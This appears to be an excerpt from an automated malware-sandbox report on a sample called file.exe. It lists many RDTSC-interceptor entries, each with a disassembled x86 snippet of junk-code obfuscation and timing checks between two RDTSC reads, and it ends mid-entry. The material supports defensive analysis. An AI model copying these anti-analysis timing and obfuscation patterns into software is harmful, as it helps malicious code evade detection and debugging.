Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7DDC9 second address: E7DDEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F8854FAEB86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8854FAEB97h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7DDEF second address: E7DE26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8865h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jl 00007F8854FD885Eh 0x00000013 push edx 0x00000014 jns 00007F8854FD8856h 0x0000001a pop edx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007F8854FD8858h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7CE6B second address: E7CE70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E484B8 second address: E484BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E81E13 second address: E81E19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E820E1 second address: E82110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8862h 0x00000007 jmp 00007F8854FD885Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F8854FD885Ah 0x00000013 push ecx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8226A second address: E82271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E82271 second address: E82284 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8854FD885Eh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E823E0 second address: E823E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E823E4 second address: E823F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F8854FD8856h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E823F8 second address: E82408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F8854FAEB86h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E858D9 second address: E858DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E860A8 second address: E860D4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d jne 00007F8854FAEB9Ah 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86184 second address: E8619F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8867h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8619F second address: E861AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F8854FAEB86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86590 second address: E86594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E86A53 second address: E86A5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FAEB8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E87548 second address: E8754D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E873B5 second address: E873B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8754D second address: E87567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8854FD885Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E873B9 second address: E873BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E87567 second address: E8756B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E873BF second address: E873C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E88637 second address: E8863B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B10D second address: E8B198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F8854FAEB97h 0x00000011 push ebx 0x00000012 js 00007F8854FAEB86h 0x00000018 pop edi 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c je 00007F8854FAEB8Ch 0x00000022 sbb edi, 6F23DD8Ch 0x00000028 jmp 00007F8854FAEB8Ch 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+124795FCh], edx 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F8854FAEB90h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jp 00007F8854FAEB99h 0x00000044 jmp 00007F8854FAEB93h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8B198 second address: E8B1AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8854FD8863h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8988B second address: E89890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8AEA2 second address: E8AEB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD885Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8A33F second address: E8A343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89890 second address: E89896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8BA31 second address: E8BA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89896 second address: E8989A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD60 second address: E3FD79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD79 second address: E3FD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD7D second address: E3FD96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FAEB91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD96 second address: E3FD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD9A second address: E3FD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E3FD9E second address: E3FDA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FDF1 second address: E8FDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90D6C second address: E90D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90D70 second address: E90D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FF11 second address: E8FFA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8854FD8869h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007F8854FD8858h 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007F8854FD8868h 0x0000001b popad 0x0000001c nop 0x0000001d push ecx 0x0000001e stc 0x0000001f pop edi 0x00000020 push dword ptr fs:[00000000h] 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F8854FD8858h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov bl, 7Fh 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov dword ptr [ebp+12466F40h], ecx 0x00000050 mov eax, dword ptr [ebp+122D049Dh] 0x00000056 mov ebx, edi 0x00000058 push FFFFFFFFh 0x0000005a mov edi, edx 0x0000005c movzx ebx, bx 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8FFA6 second address: E8FFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90FD2 second address: E90FE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8854FD8861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E92C65 second address: E92C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jo 00007F8854FAEB86h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E97CCA second address: E97CD4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8854FD8856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E433AC second address: E433CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F8854FAEB86h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8854FAEB8Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9E4AC second address: E9E4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9B839 second address: E9B843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F4F5 second address: E9F517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8854FD8858h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8854FD8860h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F517 second address: E9F51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F51B second address: E9F521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F521 second address: E9F590 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8854FAEB8Dh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F8854FAEB88h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F8854FAEB88h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2D0Dh] 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b mov dword ptr [ebp+122D2AAFh], ecx 0x00000051 pop edi 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jng 00007F8854FAEB86h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F590 second address: E9F595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F595 second address: E9F5B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8854FAEB88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F8854FAEB90h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9F5B4 second address: E9F5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA0693 second address: EA069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA069A second address: EA06A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8785 second address: EA8789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8789 second address: EA879E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pushad 0x0000000d ja 00007F8854FD8856h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA879E second address: EA87A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA7E24 second address: EA7E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8117 second address: EA8120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EA8287 second address: EA828D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAE9D7 second address: EAEA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007F8854FAEB92h 0x0000000e jmp 00007F8854FAEB8Ch 0x00000013 jnc 00007F8854FAEB99h 0x00000019 jmp 00007F8854FAEB93h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEA14 second address: EAEA18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEA18 second address: EAEA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAEA1C second address: EAEA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnc 00007F8854FD885Eh 0x0000000f jl 00007F8854FD8858h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnc 00007F8854FD8856h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2AD1 second address: EB2AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F8854FAEB86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2AE0 second address: EB2AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2DBB second address: EB2DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F8854FAEB8Eh 0x0000000b jng 00007F8854FAEB86h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F8854FAEB8Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2DDF second address: EB2DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB2DE3 second address: EB2DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB322D second address: EB3232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB7A84 second address: EB7AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8854FAEB97h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EB691A second address: EB6961 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F8854FD8866h 0x00000008 pop edx 0x00000009 jmp 00007F8854FD8861h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F8854FD8865h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83A82 second address: E83A88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83A88 second address: E83A9A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8854FD8858h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83A9A second address: E83AF7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8854FAEB86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c mov ecx, dword ptr [ebp+122D1E5Ah] 0x00000012 jmp 00007F8854FAEB91h 0x00000017 lea eax, dword ptr [ebp+1248383Dh] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F8854FAEB88h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov ecx, edi 0x00000039 nop 0x0000003a jns 00007F8854FAEB8Ah 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83AF7 second address: E83AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E83C56 second address: E83C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8402C second address: E8403B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F8854FD885Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8403B second address: E84052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jg 00007F8854FAEB8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E84052 second address: CD3BE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1D8Fh], esi 0x0000000e push dword ptr [ebp+122D0D25h] 0x00000014 adc edx, 581B92B8h 0x0000001a mov cx, 0880h 0x0000001e call dword ptr [ebp+122D1C98h] 0x00000024 pushad 0x00000025 clc 0x00000026 xor eax, eax 0x00000028 cld 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d mov dword ptr [ebp+122D1D62h], edi 0x00000033 mov dword ptr [ebp+122D2DD9h], eax 0x00000039 add dword ptr [ebp+122D1D62h], ebx 0x0000003f mov esi, 0000003Ch 0x00000044 cmc 0x00000045 add esi, dword ptr [esp+24h] 0x00000049 pushad 0x0000004a add dword ptr [ebp+122D1D62h], esi 0x00000050 mov dword ptr [ebp+122D1D62h], ecx 0x00000056 popad 0x00000057 lodsw 0x00000059 mov dword ptr [ebp+122D1D62h], ecx 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 cmc 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 pushad 0x00000069 mov edi, dword ptr [ebp+122D2C21h] 0x0000006f movsx ecx, ax 0x00000072 popad 0x00000073 jmp 00007F8854FD8864h 0x00000078 push eax 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E841A5 second address: E841A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E841A9 second address: E841AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E841AD second address: E84213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F8854FAEB86h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jnp 00007F8854FAEB90h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F8854FAEB95h 0x00000021 mov eax, dword ptr [eax] 0x00000023 push edx 0x00000024 push edx 0x00000025 jnp 00007F8854FAEB86h 0x0000002b pop edx 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 push ebx 0x00000032 ja 00007F8854FAEB88h 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a mov dword ptr [ebp+122D38B2h], edi 0x00000040 push 9676C7A0h 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 